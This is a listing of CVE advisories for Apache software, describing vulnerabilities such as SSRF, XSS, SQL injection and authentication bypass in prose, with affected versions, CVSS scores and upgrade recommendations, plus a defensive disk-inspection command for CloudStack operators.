Improper Input Validation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.11, from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-38346

The CloudStack cluster service runs on unauthenticated port (default 9090) that can be misused to run arbitrary commands on targeted hypervisors and CloudStack management server hosts. Some of these commands were found to have command injection vulnerabilities that can result in arbitrary code execution via agents on the hosts that may run as a privileged user. An attacker that can reach the cluster service on the unauthenticated port (default 9090), can exploit this to perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure. Users are recommended to restrict the network access to the cluster service port (default 9090) on a CloudStack management server host to only its peer CloudStack management server hosts. Users are recommended to upgrade to version 4.18.2.1, 4.19.0.2 or later, which addresses this issue.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-38379

Apache Allura's neighborhood settings are vulnerable to a stored XSS attack.  Only neighborhood admins can access these settings, so the scope of risk is limited to configurations where neighborhood admins are not fully trusted. This issue affects Apache Allura: from 1.4.0 through 1.17.0. Users are recommended to upgrade to version 1.17.1, which fixes the issue.

Products Affected

Vendor Product Version
apache allura *
CVE-2024-38472

SSRF in Apache HTTP Server on Windows allows to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.60 which fixes this issue.  Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-38473

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-38474

Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows attacker to execute scripts in directories permitted by the configuration but not directly reachable by any URL or source disclosure of scripts meant to only to be executed as CGI. Users are recommended to upgrade to version 2.4.60, which fixes this issue. Some RewriteRules that capture and substitute unsafely will now fail unless rewrite flag "UnsafeAllow3F" is specified.

Products Affected

Vendor Product Version
apache http_server *
netapp clustered_data_ontap 9.0
CVE-2024-38475

Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected.  Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.

Products Affected

Vendor Product Version
apache http_server *
sonicwall sma_210_firmware *
sonicwall sma_200_firmware *
sonicwall sma_500v_firmware *
sonicwall sma_410_firmware *
netapp ontap_9 -
sonicwall sma_400_firmware *
CVE-2024-38476

Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp clustered_data_ontap 9.0
CVE-2024-38477

null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp clustered_data_ontap 9.0
CVE-2024-38479

Improper Input Validation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.11, from 9.0.0 through 9.2.5. Users are recommended to upgrade to version 9.2.6, which fixes the issue, or 10.0.2, which does not have the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-38503

When editing a user, group or any object in the Syncope Console, HTML tags could be added to any text field and could lead to potential exploits. The same vulnerability was found in the Syncope Enduser, when editing “Personal Information” or “User Requests”. Users are recommended to upgrade to version 3.0.8, which fixes this issue.

Products Affected

Vendor Product Version
apache syncope *
CVE-2024-38856

Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-39573

Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly setup URL's to be handled by mod_proxy. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-39676

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Pinot. This issue affects Apache Pinot: from 0.1 before 1.0.0. Users are recommended to upgrade to version 1.0.0 and configure RBAC, which fixes the issue. Details:  When using a request to path “/appconfigs” to the controller, it can lead to the disclosure of sensitive information such as system information (e.g. arch, os version), environment information (e.g. maxHeapSize) and Pinot configurations (e.g. zookeeper path). This issue was addressed by the Role-based Access Control https://docs.pinot.apache.org/operators/tutorials/authentication/basic-auth-access-control , so that /appConfigs` and all other APIs can be access controlled. Only authorized users have access to it. Note the user needs to add the admin role accordingly to the RBAC guide to control access to this endpoint, and in the future version of Pinot, a default admin role is planned to be added.

Products Affected

Vendor Product Version
apache pinot *
CVE-2024-39863

Apache Airflow versions before 2.9.3 have a vulnerability that allows an authenticated attacker to inject a malicious link when installing a provider. Users are recommended to upgrade to version 2.9.3, which fixes this issue.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-39864

The CloudStack integration API service allows running its unauthenticated API server (usually on port 8096 when configured and enabled via integration.api.port global setting) for internal portal integrations and for testing purposes. By default, the integration API service port is disabled and is considered disabled when integration.api.port is set to 0 or negative. Due to an improper initialisation logic, the integration API service would listen on a random port when its port value is set to 0 (default value). An attacker that can access the CloudStack management network could scan and find the randomised integration API service port and exploit it to perform unauthorised administrative actions and perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure. Users are recommended to restrict the network access on the CloudStack management server hosts to only essential ports. Users are recommended to upgrade to version 4.18.2.1, 4.19.0.2 or later, which addresses this issue.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-39877

Apache Airflow 2.4.0, and versions before 2.9.3, has a vulnerability that allows authenticated DAG authors to craft a doc_md parameter in a way that could execute arbitrary code in the scheduler context, which should be forbidden according to the Airflow Security model. Users should upgrade to version 2.9.3 or later which has removed the vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-39884

A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers.   "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.61, which fixes this issue.

Products Affected

Vendor Product Version
netapp ontap_tools 10
apache http_server 2.4.60
CVE-2024-39887

An SQL Injection vulnerability in Apache Superset exists due to improper neutralization of special elements used in SQL commands. Specifically, certain engine-specific functions are not checked, which allows attackers to bypass Apache Superset's SQL authorization. To mitigate this, a new configuration key named DISALLOWED_SQL_FUNCTIONS has been introduced. This key disallows the use of the following PostgreSQL functions: version, query_to_xml, inet_server_addr, and inet_client_addr. Additional functions can be added to this list for increased protection. This issue affects Apache Superset: before 4.0.2. Users are recommended to upgrade to version 4.0.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-39928

In Apache Linkis <= 1.5.0, a Random string security vulnerability in Spark EngineConn, random string generated by the Token when starting Py4j uses the Commons Lang's RandomStringUtils. Users are recommended to upgrade to version 1.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-39954

CWE-918 Server-Side Request Forgery (SSRF) in eventmesh-runtime module in WebhookUtil.java on windows\linux\mac os e.g. allows the attacker can abuse functionality on the server to read or update internal resources. Users are recommended to upgrade to version 1.12.0 or use the master branch , which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache eventmesh *
CVE-2024-40725

A partial fix for  CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.62, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server 2.4.60
apache http_server 2.4.61
CVE-2024-40761

Inadequate Encryption Strength vulnerability in Apache Answer. This issue affects Apache Answer: through 1.3.5. Using the MD5 value of a user's email to access Gravatar is insecure and can lead to the leakage of user email. The official recommendation is to use SHA256 instead. Users are recommended to upgrade to version 1.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache answer *
CVE-2024-40898

SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context, allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests. Users are recommended to upgrade to version 2.4.62 which fixes this issue. 

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-41107

The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account. Affected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-41151

Deserialization of Untrusted Data vulnerability in Apache HertzBeat. This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat: before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-41169

The attacker can use the raft server protocol in an unauthenticated way. The attacker can see the server's resources, including directories and files. This issue affects Apache Zeppelin: from 0.10.1 up to 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue by removing the Cluster Interpreter.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-41172

In versions of Apache CXF before 3.6.4 and 4.0.5 (3.5.x and lower versions are not impacted), a CXF HTTP client conduit may prevent HTTPClient instances from being garbage collected and it is possible that memory consumption will continue to increase, eventually causing the application to run out of memory

Products Affected

Vendor Product Version
apache cxf *
CVE-2024-41177

Incomplete Blacklist to Cross-Site Scripting vulnerability in Apache Zeppelin. This issue affects Apache Zeppelin: before 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-41178

Exposure of temporary credentials in logs in Apache Arrow Rust Object Store (`object_store` crate), version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens.  On certain error conditions, the logs may contain the OIDC token passed to AssumeRoleWithWebIdentity https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html . This allows someone with access to the logs to impersonate that identity, including performing their own calls to AssumeRoleWithWebIdentity, until the OIDC token expires. Typically OIDC tokens are valid for up to an hour, although this will vary depending on the issuer. Users are recommended to use a different AWS authentication mechanism, disable logging or upgrade to version 0.10.2, which fixes this issue. Details: When using AWS WebIdentityTokens with the object_store crate, in the event of a failure and automatic retry, the underlying reqwest error, including the full URL with the credentials, potentially in the parameters, is written to the logs.  Thanks to Paul Hatcherian for reporting this vulnerability

Products Affected

Vendor Product Version
apache arrow *
CVE-2024-41888

Missing Release of Resource after Effective Lifetime vulnerability in Apache Answer. This issue affects Apache Answer: through 1.3.5. The password reset link remains valid within its expiration period even after it has been used. This could potentially lead to the link being misused or hijacked. Users are recommended to upgrade to version 1.3.6, which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-41890

Missing Release of Resource after Effective Lifetime vulnerability in Apache Answer. This issue affects Apache Answer: through 1.3.5. User sends multiple password reset emails, each containing a valid link. Within the link's validity period, this could potentially lead to the link being misused or hijacked. Users are recommended to upgrade to version 1.3.6, which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-41909

Like many other SSH implementations, Apache MINA SSHD suffered from the issue that is more widely known as CVE-2023-48795. An attacker that can intercept traffic between client and server could drop certain packets from the stream, potentially causing client and server to consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack The mitigations to prevent this type of attack were implemented in Apache MINA SSHD 2.12.0, both client and server side. Users are recommended to upgrade to at least this version. Note that both the client and the server implementation must have mitigations applied against this issue, otherwise the connection may still be affected.

Products Affected

Vendor Product Version
apache mina_sshd *
CVE-2024-41937

Apache Airflow, versions before 2.10.0, have a vulnerability that allows the developer of a malicious provider to execute a cross-site scripting attack when clicking on a provider documentation link. This would require the provider to be installed on the web server and the user to click the provider link. Users should upgrade to 2.10.0 or later, which fixes this vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-42062

CloudStack account-users by default use username and password based authentication for API and UI access. Account-users can generate and register randomised API and secret keys and use them for the purpose of API-based automation and integrations. Due to an access permission validation issue that affects Apache CloudStack versions 4.10.0 up to 4.19.1.0, domain admin accounts were found to be able to query all registered account-users API and secret keys in an environment, including that of a root admin. An attacker who has domain admin access can exploit this to gain root admin and other-account privileges and perform malicious operations that can result in compromise of resources integrity and confidentiality, data loss, denial of service and availability of CloudStack managed infrastructure. Users are recommended to upgrade to Apache CloudStack 4.18.2.3 or 4.19.1.1, or later, which addresses this issue. Additionally, all account-user API and secret keys should be regenerated.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-42222

In Apache CloudStack 4.19.1.0, a regression in the network listing API allows unauthorised list access of network details for domain admin and normal user accounts. This vulnerability compromises tenant isolation, potentially leading to unauthorised access to network details, configurations and data. Affected users are advised to upgrade to version 4.19.1.1 to address this issue. Users on older versions of CloudStack considering to upgrade, can skip 4.19.1.0 and upgrade directly to 4.19.1.1.

Products Affected

Vendor Product Version
apache cloudstack 4.19.1.0
CVE-2024-42323

SnakeYaml Deser Load Malicious xml rce vulnerability in Apache HertzBeat (incubating).  This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat (incubating): before 1.6.0. Users are recommended to upgrade to version 1.6.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-42447

Insufficient Session Expiration vulnerability in Apache Airflow Providers FAB. This issue affects Apache Airflow Providers FAB: 1.2.1 (when used with Apache Airflow 2.9.3) and FAB 1.2.0 for all Airflow versions. The FAB provider prevented the user from logging out.   * FAB provider 1.2.1 only affected Airflow 2.9.3 (earlier and later versions of Airflow are not affected) * FAB provider 1.2.0 affected all versions of Airflow. Users who run Apache Airflow 2.9.3 are recommended to upgrade to Apache Airflow Providers FAB version 1.2.2 which fixes the issue. Users who run Any Apache Airflow version and have FAB provider 1.2.0 are recommended to upgrade to Apache Airflow Providers FAB version 1.2.2 which fixes the issue. Also upgrading Apache Airflow to latest version available is recommended. Note: Early version of Airflow reference container images of Airflow 2.9.3 and constraint files contained FAB provider 1.2.1 version, but this is fixed in updated versions of the images.  Users are advised to pull the latest Airflow images or reinstall FAB provider according to the current constraints.

Products Affected

Vendor Product Version
apache apache-airflow-providers-fab 1.2.1
apache apache-airflow-providers-fab 1.2.0
CVE-2024-42516

HTTP response splitting in the core of Apache HTTP Server allows an attacker who can manipulate the Content-Type response headers of applications hosted or proxied by the server can split the HTTP response. This vulnerability was described as CVE-2023-38709 but the patch included in Apache HTTP Server 2.4.59 did not address the issue. Users are recommended to upgrade to version 2.4.64, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-43115

Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can execute any shell script server by alert script. This issue affects Apache DolphinScheduler: before 3.2.2. Users are recommended to upgrade to version 3.3.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2024-43166

Incorrect Default Permissions vulnerability in Apache DolphinScheduler. This issue affects Apache DolphinScheduler: before 3.2.2. Users are recommended to upgrade to version 3.3.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2024-43204

SSRF in Apache HTTP Server with mod_proxy loaded allows an attacker to send outbound proxy requests to a URL controlled by the attacker.  Requires an unlikely configuration where mod_headers is configured to modify the Content-Type request or response header with a value provided in the HTTP request. Users are recommended to upgrade to version 2.4.64 which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-43383

Deserialization of Untrusted Data vulnerability in Apache Lucene.Net.Replicator. This issue affects Apache Lucene.NET's Replicator library: from 4.8.0-beta00005 through 4.8.0-beta00016. An attacker that can intercept traffic between a replication client and server, or control the target replication node URL, can provide a specially-crafted JSON response that is deserialized as an attacker-provided exception type. This can result in remote code execution or other potential unauthorized access. Users are recommended to upgrade to version 4.8.0-beta00017, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache lucene.net 4.8.0
CVE-2024-43394

Server-Side Request Forgery (SSRF) in Apache HTTP Server on Windows allows to potentially leak NTLM hashes to a malicious server via  mod_rewrite or apache expressions that pass unvalidated request input. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.63. Note:  The Apache HTTP Server Project will be setting a higher bar for accepting vulnerability reports regarding SSRF via UNC paths. The server offers limited protection against administrators directing the server to open UNC paths. Windows servers should limit the hosts they will connect over via SMB based on the nature of NTLM authentication.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-43441

Authentication Bypass by Assumed-Immutable Data vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.5.0. Users are recommended to upgrade to version 1.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2024-44088

Malicious script injection ('Cross-site Scripting') vulnerability in Apache Geode web-api (REST). This vulnerability allows an attacker that tricks a logged-in user into clicking a specially-crafted link to execute code on the returned page, which could lead to theft of the user's session information and even account takeover. This issue affects Apache Geode: all versions prior to 1.15.2 Users are recommended to upgrade to version 1.15.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache geode *
CVE-2024-45031

When editing objects in the Syncope Console, incomplete HTML tags could be used to bypass HTML sanitization. This made it possible to inject stored XSS payloads which would trigger for other users during ordinary usage of the application. XSS payloads could also be injected in Syncope Enduser when editing “Personal Information” or “User Requests”: such payloads would trigger for administrators in Syncope Console, thus enabling session hijacking. Users are recommended to upgrade to version 3.0.9, which fixes this issue.

Products Affected

Vendor Product Version
apache syncope *
CVE-2024-45033

Insufficient Session Expiration vulnerability in Apache Airflow Fab Provider. This issue affects Apache Airflow Fab Provider: before 1.5.2. When user password has been changed with admin CLI, the sessions for that user have not been cleared, leading to insufficient session expiration, thus logged users could continue to be logged in even after the password was changed. This only happened when the password was changed with CLI. The problem does not happen in case change was done with webserver thus this is different from  CVE-2023-40273 https://github.com/advisories/GHSA-pm87-24wq-r8w9  which was addressed in Apache-Airflow 2.7.0 Users are recommended to upgrade to version 1.5.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache apache-airflow-providers-fab *
CVE-2024-45034

Apache Airflow versions before 2.10.1 have a vulnerability that allows DAG authors to add local settings to the DAG folder and get it executed by the scheduler, where the scheduler is not supposed to execute code submitted by the DAG author. Users are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-45106

Improper authentication of an HTTP endpoint in the S3 Gateway of Apache Ozone 1.4.0 allows any authenticated Kerberos user to revoke and regenerate the S3 secrets of any other user. This is only possible if: * ozone.s3g.secret.http.enabled is set to true. The default value of this configuration is false. * The user configured in ozone.s3g.kerberos.principal is also configured in ozone.s3.administrators or ozone.administrators. Users are recommended to upgrade to Apache Ozone version 1.4.1 which disables the affected endpoint.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache ozone 1.4.0
CVE-2024-45195

Direct Request ('Forced Browsing') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-45216

Improper Authentication vulnerability in Apache Solr. Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass. A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path. This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing. This issue affects Apache Solr: from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0. Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue.

Products Affected

Vendor Product Version
apache solr *
CVE-2024-45217

Insecure Default Initialization of Resource vulnerability in Apache Solr. New ConfigSets that are created via a Restore command, which copy a configSet from the backup and give it a new name, are created without setting the "trusted" metadata. ConfigSets that do not contain the flag are trusted implicitly if the metadata is missing, therefore this leads to "trusted" ConfigSets that may not have been created with an Authenticated request. "trusted" ConfigSets are able to load custom code into classloaders, therefore the flag is supposed to only be set when the request that uploads the ConfigSet is Authenticated & Authorized. This issue affects Apache Solr: from 6.6.0 before 8.11.4, from 9.0.0 before 9.7.0. This issue does not affect Solr instances that are secured via Authentication/Authorization. Users are primarily recommended to use Authentication and Authorization when running Solr. However, upgrading to version 9.7.0, or 8.11.4 will mitigate this issue otherwise.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache solr *
CVE-2024-45219

Account users in Apache CloudStack by default are allowed to upload and register templates for deploying instances and volumes for attaching them as data disks to their existing instances. Due to missing validation checks for KVM-compatible templates or volumes in CloudStack 4.0.0 through 4.18.2.3 and 4.19.0.0 through 4.19.1.1, an attacker that can upload or register templates and volumes, can use them to deploy malicious instances or attach uploaded volumes to their existing instances on KVM-based environments and exploit this to gain access to the host filesystems that could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of KVM-based infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue. Additionally, all user-uploaded or registered KVM-compatible templates and volumes can be scanned and checked that they are flat files that should not be using any additional or unnecessary features. For example, operators can run this on their secondary storage(s) and inspect output. An empty output for the disk being validated means it has no references to the host filesystems; on the other hand, if the output for the disk being validated is not empty, it might indicate a compromised disk. for file in $(find /path/to/storage/ -type f -regex [a-f0-9\-]*.*); do echo "Retrieving file [$file] info. If the output is not empty, that might indicate a compromised disk; check it carefully."; qemu-img info -U $file | grep file: ; printf "\n\n"; done The command can also be run for the file-based primary storages; however, bear in mind that (i) volumes created from templates will have references for the templates at first and (ii) volumes can be consolidated while migrating, losing their references to the templates. Therefore, the command execution for the primary storages can show both false positives and false negatives. For checking the whole template/volume features of each disk, operators can run the following command: for file in $(find /path/to/storage/ -type f -regex [a-f0-9\-]*.*); do echo "Retrieving file [$file] info."; qemu-img info -U $file; printf "\n\n"; done

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45384

Padding Oracle vulnerability in Apache Druid extension, druid-pac4j. This could allow an attacker to manipulate a pac4j session cookie. This issue affects Apache Druid versions 0.18.0 through 30.0.0. Since the druid-pac4j extension is optional and disabled by default, Druid installations not using the druid-pac4j extension are not affected by this vulnerability. While we are not aware of a way to meaningfully exploit this flaw, we nevertheless recommend upgrading to version 30.0.1 or higher which fixes the issue and ensuring you have a strong druid.auth.pac4j.cookiePassphrase as a precaution.

Products Affected

Vendor Product Version
apache druid *
CVE-2024-45387

An SQL injection vulnerability in Traffic Ops in Apache Traffic Control <= 8.0.1, >= 8.0.0 allows a privileged user with role "admin", "federation", "operations", "portal", or "steering" to execute arbitrary SQL against the database by sending a specially-crafted PUT request. Users are recommended to upgrade to version Apache Traffic Control 8.0.2 if you run an affected version of Traffic Ops.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
security@apache.org 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2024-45461

The CloudStack Quota feature allows cloud administrators to implement a quota or usage limit system for cloud resources, and is disabled by default. In environments where the feature is enabled, due to missing access check enforcements, non-administrative CloudStack user accounts are able to access and modify quota-related configurations and data. This issue affects Apache CloudStack from 4.7.0 through 4.18.2.3; and from 4.19.0.0 through 4.19.1.1, where the Quota feature is enabled. Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue. Alternatively, users that do not use the Quota feature are advised to disabled the plugin by setting the global setting "quota.enable.service" to "false".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
